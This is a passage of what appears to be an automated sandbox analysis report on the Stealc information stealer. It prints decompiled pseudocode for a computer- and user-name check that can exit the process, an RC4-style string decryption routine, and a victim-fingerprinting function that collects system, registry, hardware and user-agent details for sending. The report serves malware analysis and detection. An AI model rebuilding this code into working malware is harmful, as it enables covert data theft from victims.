              • Instruction Fuzzy Hash: A1014472F00108ABDB08DBADDC45A9DBBFAEBC4350F14817AF508E3245DF719A118A54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 220 171091-1710a3 call 17d1c5 call 17d733 225 1710a5-1710b7 call 17d193 call 17d733 220->225 226 1710c0 220->226 225->226 231 1710b9-1710ba ExitProcess 225->231
              C-Code - Quality: 100%
              			E00171091() {
              				void* _t1;
              				int _t2;
              				void* _t3;
              				void* _t4;
              				intOrPtr _t5;
              				intOrPtr _t6;
              
              				_t1 = E0017D1C5(_t4);
              				_t5 =  *0x383454; // 0xdc10b8
              				_t2 = E0017D733(_t1, _t4, _t5);
              				if(_t2 == 0) {
              					_t3 = E0017D193(_t4);
              					_t6 =  *0x38350c; // 0xdc1168
              					_t2 = E0017D733(_t3, _t4, _t6);
              					if(_t2 == 0) {
              						ExitProcess(_t2);
              					}
              				}
              				return _t2;
              			}









              0x00171091
              0x00171096
              0x0017109c
              0x001710a3
              0x001710a5
              0x001710aa
              0x001710b0
              0x001710b7
              0x001710ba
              0x001710ba
              0x001710b7
              0x001710c0

              APIs
                • Part of subcall function 0017D1C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00171096,0017CFE5,0017FBD9), ref: 0017D1D1
                • Part of subcall function 0017D1C5: RtlAllocateHeap.NTDLL(00000000), ref: 0017D1D8
                • Part of subcall function 0017D1C5: GetComputerNameA.KERNEL32(00000000,?), ref: 0017D1EC
                • Part of subcall function 0017D193: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001710AA,0017CFE5,0017FBD9), ref: 0017D19F
                • Part of subcall function 0017D193: RtlAllocateHeap.NTDLL(00000000), ref: 0017D1A6
                • Part of subcall function 0017D193: GetUserNameA.ADVAPI32(00000000,?), ref: 0017D1BA
              • ExitProcess.KERNEL32 ref: 001710BA
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Heap$Process$AllocateName$ComputerExitUser
              • String ID:
              • API String ID: 3550813701-0
              • Opcode ID: 3081b0fec0958faf10fee828d6bf76c37a5fd59d1f5fd753c986f929e58e61a7
              • Instruction ID: ba56e51c47897bad2c1582de5e0a0c543cf66f4ccbe9e3d2f4d2f329ef3e5c83
              • Opcode Fuzzy Hash: 3081b0fec0958faf10fee828d6bf76c37a5fd59d1f5fd753c986f929e58e61a7
              • Instruction Fuzzy Hash: 36D0C93090038456AB22BF35FD5665A337D6E61784B10C664B40887326EF20DA008F40
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 232 172f36-172f53 call 17d781 235 172f55-172f74 232->235 235->235 236 172f76 235->236 237 172f78-172f92 236->237 238 172f94-172f9b 237->238 239 172f9c-172fb2 237->239 238->239 239->237 240 172fb4-172fd5 call 17d781 malloc 239->240 243 173072-173082 240->243 244 172fdb-172fe4 240->244 245 172fe7-172fee 244->245 246 172ff0-172ff7 245->246 247 172ff8-173009 245->247 246->247 248 173013-173029 247->248 249 17300b-173012 247->249 250 173032-173043 248->250 251 17302b-173031 248->251 249->248 252 173045-17304b 250->252 253 17304d-173054 250->253 251->250 254 173057-173069 call 17d781 252->254 253->254 254->245 257 17306f 254->257 257->243
              C-Code - Quality: 100%
              			E00172F36(intOrPtr* _a4, void** _a8) {
              				void* _v8;
              				intOrPtr _v12;
              				intOrPtr* _v16;
              				void* _v20;
              				intOrPtr* _t55;
              				void* _t56;
              				void* _t58;
              				intOrPtr* _t59;
              				signed int _t62;
              				signed int* _t63;
              				signed int _t70;
              				signed int _t78;
              				intOrPtr* _t81;
              				intOrPtr* _t86;
              				intOrPtr _t87;
              				signed char _t88;
              				signed int _t92;
              				void* _t93;
              				intOrPtr* _t94;
              				intOrPtr* _t95;
              				intOrPtr _t97;
              				signed int _t99;
              				signed int _t103;
              				intOrPtr _t104;
              				signed int _t105;
              				void* _t109;
              
              				_t97 =  *0x38326c; // 0x17fbf0
              				_t70 = 0;
              				_t103 = 0;
              				_t78 = E0017D781(_t97);
              				do {
              					_t92 = _t103 % _t78;
              					 *(_t109 + _t103 * 4 - 0x410) = _t103;
              					_t103 = _t103 + 1;
              					 *(_t109 + _t103 * 4 - 0x814) =  *(_t92 + _t97) & 0x000000ff;
              				} while (_t103 < 0x100);
              				_t93 = 0;
              				do {
              					_t55 = _t109 + _t93 - 0x410;
              					_t104 =  *_t55;
              					_t70 = _t70 +  *((intOrPtr*)(_t109 + _t93 - 0x810)) + _t104 & 0x800000ff;
              					if(_t70 < 0) {
              						_t70 = (_t70 - 0x00000001 | 0xffffff00) + 1;
              					}
              					_t81 = _t109 + _t70 * 4 - 0x410;
              					_t93 = _t93 + 4;
              					 *_t55 =  *_t81;
              					 *_t81 = _t104;
              				} while (_t93 < 0x400);
              				_t56 = E0017D781(_a4);
              				_t20 = _t56 + 1; // 0x1
              				_t58 = malloc(_t20); // executed
              				_t105 = 0;
              				_t99 = 0;
              				_v20 = _t58;
              				_v12 = 0;
              				if(_t56 > 0) {
              					_t86 = _a4;
              					_v8 = _t58;
              					_v8 = _v8 - _t86;
              					_v16 = _t86;
              					do {
              						_t105 = _t105 + 0x00000001 & 0x800000ff;
              						if(_t105 < 0) {
              							_t105 = (_t105 - 0x00000001 | 0xffffff00) + 1;
              						}
              						_t59 = _t109 + _t105 * 4 - 0x410;
              						_t87 =  *_t59;
              						_t99 = _t99 + _t87 & 0x800000ff;
              						if(_t99 < 0) {
              							_t99 = (_t99 - 0x00000001 | 0xffffff00) + 1;
              						}
              						_t94 = _t109 + _t99 * 4 - 0x410;
              						 *_t59 =  *_t94;
              						 *_t94 = _t87;
              						_t62 =  *_t59 + _t87 & 0x800000ff;
              						if(_t62 < 0) {
              							_t62 = (_t62 - 0x00000001 | 0xffffff00) + 1;
              						}
              						_t95 = _v16;
              						_t88 =  *_t95;
              						_t63 = _t109 + _t62 * 4 - 0x410;
              						if( *_t63 != (_t88 & 0x000000ff)) {
              							 *(_v8 + _t95) =  *_t63 ^ _t88;
              						} else {
              							 *(_v8 + _t95) = _t88;
              						}
              						_v12 = _v12 + 1;
              						_v16 = _t95 + 1;
              					} while (_v12 < E0017D781(_a4));
              					_t58 = _v20;
              				}
              				 *((char*)(_t58 + _v12)) = 0;
              				 *_a8 = _t58;
              				return _t58;
              			}





























              0x00172f42
              0x00172f4a
              0x00172f4c
              0x00172f53
              0x00172f55
              0x00172f59
              0x00172f5b
              0x00172f62
              0x00172f67
              0x00172f6e
              0x00172f76
              0x00172f78
              0x00172f7f
              0x00172f86
              0x00172f8c
              0x00172f92
              0x00172f9b
              0x00172f9b
              0x00172f9c
              0x00172fa5
              0x00172fa8
              0x00172faa
              0x00172fac
              0x00172fb7
              0x00172fbe
              0x00172fc2
              0x00172fc8
              0x00172fca
              0x00172fcd
              0x00172fd0
              0x00172fd5
              0x00172fdb
              0x00172fde
              0x00172fe1
              0x00172fe4
              0x00172fe7
              0x00172fe8
              0x00172fee
              0x00172ff7
              0x00172ff7
              0x00172ff8
              0x00172fff
              0x00173003
              0x00173009
              0x00173012
              0x00173012
              0x00173013
              0x0017301c
              0x0017301e
              0x00173024
              0x00173029
              0x00173031
              0x00173031
              0x00173032
              0x00173035
              0x0017303a
              0x00173043
              0x00173054
              0x00173045
              0x00173048
              0x00173048
              0x00173057
              0x0017305e
              0x00173066
              0x0017306f
              0x0017306f
              0x00173076
              0x0017307e
              0x00173082

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: malloc
              • String ID:
              • API String ID: 2803490479-0
              • Opcode ID: 1a58f88ea85b8104d3a709b2c7961bf354f5fd1c3414a0b1256196f1c05a4b6a
              • Instruction ID: 345407be096df158fcc997cb47ce993455707ffb88520861e836cd771e7759ab
              • Opcode Fuzzy Hash: 1a58f88ea85b8104d3a709b2c7961bf354f5fd1c3414a0b1256196f1c05a4b6a
              • Instruction Fuzzy Hash: AA410575A002199FCB05CFA8D8806E8B7B1FF99318F2485B9D869D7391C7306A42DF90
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 998 1792e7-1794f5 call 17e990 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d0be call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap 1090 1794f7-179506 998->1090 1091 17950f-179588 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetCurrentProcess 998->1091 1090->1091 1112 179595 1091->1112 1113 17958a-179593 1091->1113 1114 17959a-179774 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d193 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d1c5 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap 1112->1114 1113->1112 1113->1114 1194 179776-17978f 1114->1194 1195 179792-1797fc call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 1114->1195 1194->1195 1216 179805-179818 1195->1216 1217 1797fe-179803 1195->1217 1218 17981f-1798f0 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d200 call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 1216->1218 1217->1218 1261 1798f2-1798fb 1218->1261 1262 1798fd 1218->1262 1261->1262 1263 179902-179997 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap 1261->1263 1262->1263 1283 1799b1-179b0a call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d2f3 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetSystemInfo call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap 1263->1283 1284 179999-1799a8 1263->1284 1343 179b0c-179b1c 1283->1343 1284->1283 1345 179b1e-179b38 GlobalMemoryStatusEx 1343->1345 1346 179b4f-179b51 1345->1346 1347 179b3a-179b4d 1345->1347 1348 179b53-179eb5 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 GetProcessHeap RtlAllocateHeap call 17e990 call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d3b2 call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d460 call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17d460 call 17ea69 call 17ea2f call 171839 * 2 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 call 17eaab call 17ea2f call 171839 1346->1348 1347->1348 1491 179eb8 call 17d661 1348->1491 1492 179ebd-179f33 call 17ea69 call 17ea2f call 171839 * 2 lstrlen call 17e990 call 1716cb call 173786 call 171839 * 2 call 1716ac 1491->1492
              C-Code - Quality: 83%
              			E001792E7(signed int __ecx, void* __eflags, char _a4) {
              				char _v16;
              				char _v27;
              				char _v28;
              				char _v40;
              				signed int _v44;
              				char _v56;
              				char _v60;
              				signed short _v64;
              				signed short _v66;
              				signed short _v68;
              				signed short _v70;
              				char _v72;
              				signed short _v74;
              				signed short _v76;
              				intOrPtr _v80;
              				char _v92;
              				char _v104;
              				char _v116;
              				char _v128;
              				char _v140;
              				char _v152;
              				char _v164;
              				char _v176;
              				char _v188;
              				char _v200;
              				char _v212;
              				char _v224;
              				char _v236;
              				char _v248;
              				char _v260;
              				char _v272;
              				struct _SYSTEM_INFO _v312;
              				unsigned int _v328;
              				signed int _v332;
              				char _v340;
              				signed int _v516;
              				char _v1516;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t436;
              				intOrPtr _t456;
              				void* _t505;
              				void* _t550;
              				void* _t551;
              				void* _t570;
              				intOrPtr _t590;
              				void* _t609;
              				long _t663;
              				struct _MEMORYSTATUSEX* _t664;
              				unsigned int _t665;
              				signed int _t682;
              				intOrPtr _t683;
              				intOrPtr _t684;
              				void* _t687;
              				void* _t746;
              				void* _t765;
              				unsigned int _t806;
              				signed int _t809;
              				signed int _t818;
              				void* _t819;
              				signed int _t820;
              				void* _t822;
              				void* _t824;
              				void* _t867;
              				void* _t899;
              				void* _t925;
              				void* _t944;
              				void* _t992;
              				void* _t993;
              				void* _t994;
              				void* _t995;
              				signed int _t1006;
              
              				_t1001 = __eflags;
              				_t818 = __ecx;
              				E0017E990( &_v16, __eflags, 0x17fbd9);
              				_t814 = "\n";
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, __eflags, "\n"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "Network Info:"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\t- IP: IP?"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\t- Country: ISO?"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, _t814), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001,  *0x3830d0), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001,  *0x383004), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EA69( &_v16, _t818, E0017D0BE( &_v40),  &_v28, _t1001), _t818,  &_v16);
              				E00171839(_v28);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001,  *0x383290), _t818,  &_v16);
              				E00171839(_v40);
              				_v60 = 0xff;
              				_t867 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_t436 =  *0x383684(0x80000002,  *0x3832d0, 0, 0x20119,  &_v44);
              				_t1002 = _t436;
              				if(_t436 == 0) {
              					 *0x38366c(_v44,  *0x383360, 0, 0, _t867,  &_v60);
              				}
              				 *0x3836f0(_v44);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1002, _t867), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1002, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1002,  *0x383528), _t818,  &_v16);
              				E00171839(_v40);
              				_v44 = _v44 & 0x00000000;
              				_push( &_v44);
              				_push(GetCurrentProcess());
              				if( *0x38374c() == 0) {
              					L4:
              					_t456 =  *0x383204; // 0x0
              				} else {
              					_t1004 = _v44;
              					_t456 =  *0x3830c4; // 0x0
              					if(_v44 == 0) {
              						goto L4;
              					}
              				}
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t456), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x3830f0), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, E0017D193(_t818)), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x383250), _t818,  &_v16);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, E0017D1C5(_t818)), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x38318c), _t818,  &_v16);
              				E00171839(_v40);
              				_t505 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				 *0x3836cc( &_v76);
              				 *0x3835d0(_t505,  *0x383520, _v76 & 0x0000ffff, _v74 & 0x0000ffff, _v70 & 0x0000ffff, _v68 & 0x0000ffff, _v66 & 0x0000ffff, _v64 & 0x0000ffff);
              				_t994 = _t993 + 0x20;
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t505), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1004, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1004,  *0x3832bc), _t818,  &_v16);
              				E00171839(_v40);
              				_t899 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_push( &_v516);
              				if( *0x3837a4() != 0xffffffff) {
              					_t809 = _v516;
              					_t818 = 0xffffffc4;
              					asm("cdq");
              					_t1006 = _t809 % _t818;
              					 *0x3835d0(_t899, "%d", _t809 / _t818);
              					_t994 = _t994 + 0xc;
              				}
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1006, _t899), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1006, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1006,  *0x383378), _t818,  &_v16);
              				E00171839(_v40);
              				_t550 =  *0x383654( &_v516, 0x55);
              				_t1007 = _t550;
              				if(_t550 != 0) {
              					_t551 =  *0x3836e8(0x40, 5);
              					_t906 = _t551;
              					 *0x3836d4( &_v516, _t551);
              				} else {
              					_t906 = 0x17fbd9;
              				}
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1007, _t906), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1007, _t814), _t818,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1007,  *0x3833d4), _t818,  &_v16);
              				E00171839(_v40);
              				_t570 = E0017D200(_t1007,  &_v40);
              				_pop(_t819);
              				E0017EA2F(E0017EA69( &_v16, _t819, _t570,  &_v28, _t1007), _t819,  &_v16);
              				E00171839(_v28);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1007, _t814), _t819,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v40, _t1007,  *0x3830f4), _t819,  &_v16);
              				E00171839(_v40);
              				_push( &_v28);
              				if( *0x3835cc() == 0) {
              					L12:
              					_t590 =  *0x383048; // 0x0
              				} else {
              					_t1009 = _v27 - 0x80;
              					_t590 =  *0x38331c; // 0x0
              					if(_v27 >= 0x80) {
              						goto L12;
              					}
              				}
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1009, _t590), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1009, _t814), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1009,  *0x3830c0), _t819,  &_v16);
              				E00171839(_v28);
              				_v60 = 0xff;
              				_t925 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_t609 =  *0x383684(0x80000002,  *0x383124, 0, 0x20119,  &_v44);
              				_t1010 = _t609;
              				if(_t609 == 0) {
              					 *0x38366c(_v44,  *0x383404, 0, 0, _t925,  &_v60);
              				}
              				 *0x3836f0(_v44);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t925), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x383298), _t819,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, E0017D2F3()), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x3833c4), _t819,  &_v16);
              				E00171839(_v28);
              				GetSystemInfo( &_v312);
              				 *0x3835d0( &_v1516, "%d", _v312.dwNumberOfProcessors);
              				_t995 = _t994 + 0xc;
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010,  &_v1516), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v56, _t1010, _t814), _t819,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t819,  &_v28, _t1010,  *0x383240), _t819,  &_v16);
              				E00171839(_v28);
              				_t944 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				_t663 = 0;
              				do {
              					 *((char*)(_t992 + _t663 - 0x150)) = 0;
              					if (_t663 != 0) goto L17;
              					_t663 = _t663 + 1;
              				} while (_t663 < 0x40);
              				_t664 =  &_v340;
              				_v340 = 0x40;
              				GlobalMemoryStatusEx(_t664);
              				_t1014 = _t664 - 1;
              				if(_t664 != 1) {
              					_t820 = 0;
              					_t665 = 0;
              					__eflags = 0;
              				} else {
              					_t806 = _v328;
              					_t820 = (_t806 << 0x00000020 | _v332) >> 0x14;
              					_t665 = _t806 >> 0x14;
              				}
              				 *0x3835d0(_t944, "%d MB", _t820, _t665);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v56, _t1014, _t944), _t820,  &_v16);
              				E00171839(_v56);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v28, _t1014, _t814), _t820,  &_v16);
              				E00171839(_v28);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v40, _t1014, "\t- Display Resolution: "), _t820,  &_v16);
              				E00171839(_v40);
              				_t682 =  *0x3836f4( *0x383038, 0, 0, 0);
              				_v44 = _t682;
              				_t683 =  *0x3836a0(_t682, 8);
              				_v80 = _t683;
              				_t684 =  *0x3836a0(_v44, 0xa);
              				_v60 = _t684;
              				 *0x383734(0, _v44);
              				_t687 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
              				 *0x3835d0("%dx%d", _v80, _v60);
              				E0017E990( &_v40, 0, _t687);
              				E0017EA2F(E0017EA69( &_v16, _t820,  &_v40,  &_v56, 0), _t820,  &_v16);
              				E00171839(_v56);
              				E00171839(_v40);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v248, 0, _t814), _t820,  &_v16);
              				E00171839(_v248);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v260, 0,  *0x3834f0), _t820,  &_v16);
              				E00171839(_v260);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v116, 0, _t814), _t820,  &_v16);
              				E00171839(_v116);
              				E0017EA2F(E0017EA69( &_v16, _t820, E0017D3B2( &_v224, 0),  &_v116, 0), _t820,  &_v16);
              				E00171839(_v116);
              				E00171839(_v224);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v212, 0, "User Agents:"), _t820,  &_v16);
              				E00171839(_v212);
              				_t816 = "\n";
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v236, 0, "\n"), _t820,  &_v16);
              				E00171839(_v236);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v140, 0,  *0x383120), _t820,  &_v16);
              				E00171839(_v140);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v176, 0, "\n"), _t820,  &_v16);
              				E00171839(_v176);
              				E0017EA2F(E0017EAAB( &_v16, _t820,  &_v92, 0,  *0x383508), _t820,  &_v16);
              				E00171839(_v92);
              				_t746 = E0017D460(0,  &_v200, 0x80000002);
              				_t822 = _t687;
              				E0017EA2F(E0017EA69( &_v16, _t822, _t746,  &_v92, 0), _t822,  &_v16);
              				E00171839(_v92);
              				E00171839(_v200);
              				E0017EA2F(E0017EAAB( &_v16, _t822,  &_v272, 0, "\n"), _t822,  &_v16);
              				E00171839(_v272);
              				E0017EA2F(E0017EAAB( &_v16, _t822,  &_v104, 0,  *0x3834d4), _t822,  &_v16);
              				E00171839(_v104);
              				_t765 = E0017D460(0,  &_v152, 0x80000001);
              				_pop(_t824);
              				E0017EA2F(E0017EA69( &_v16, _t824, _t765,  &_v104, 0), _t824,  &_v16);
              				E00171839(_v104);
              				E00171839(_v152);
              				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v164, 0, "\n"), _t824,  &_v16);
              				E00171839(_v164);
              				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v188, 0, _t816), _t824,  &_v16);
              				E00171839(_v188);
              				E0017EA2F(E0017EAAB( &_v16, _t824,  &_v128, 0,  *0x3834c8), _t824,  &_v16);
              				E00171839(_v128);
              				E0017EA2F(E0017EA69( &_v16, _t824, E0017D661( &_v72, 0),  &_v128, 0), _t824,  &_v16);
              				E00171839(_v128);
              				E00171839(_v72);
              				_push( *0x383658(_v16));
              				_push(_v16);
              				E0017E990(_t995 + 0x20 - 0xc, 0,  *0x3831dc);
              				E001716CB( &_a4, _t995 + 0x20 - 0xffffffffffffffbc);
              				_push( &_v72);
              				E00173786(_t824, 0);
              				E00171839(_v72);
              				E00171839(_v16);
              				return E001716AC( &_a4);
              			}












































































              0x001792e7
              0x001792e7
              0x001792fb
              0x00179300
              0x00179314
              0x0017931c
              0x00179334
              0x0017933c
              0x00179350
              0x00179358
              0x00179370
              0x00179378
              0x0017938c
              0x00179394
              0x001793ac
              0x001793b4
              0x001793c8
              0x001793d0
              0x001793e4
              0x001793ec
              0x00179405
              0x0017940d
              0x00179421
              0x00179429
              0x00179442
              0x0017944a
              0x00179467
              0x0017946f
              0x00179477
              0x0017948b
              0x00179493
              0x001794ac
              0x001794b4
              0x001794c1
              0x001794d5
              0x001794ed
              0x001794f3
              0x001794f5
              0x00179509
              0x00179509
              0x00179512
              0x00179527
              0x0017952f
              0x00179543
              0x0017954b
              0x00179564
              0x0017956c
              0x00179571
              0x00179578
              0x0017957f
              0x00179588
              0x00179595
              0x00179595
              0x0017958a
              0x0017958a
              0x0017958e
              0x00179593
              0x00000000
              0x00000000
              0x00179593
              0x001795a9
              0x001795b1
              0x001795c5
              0x001795cd
              0x001795e6
              0x001795ee
              0x00179607
              0x0017960f
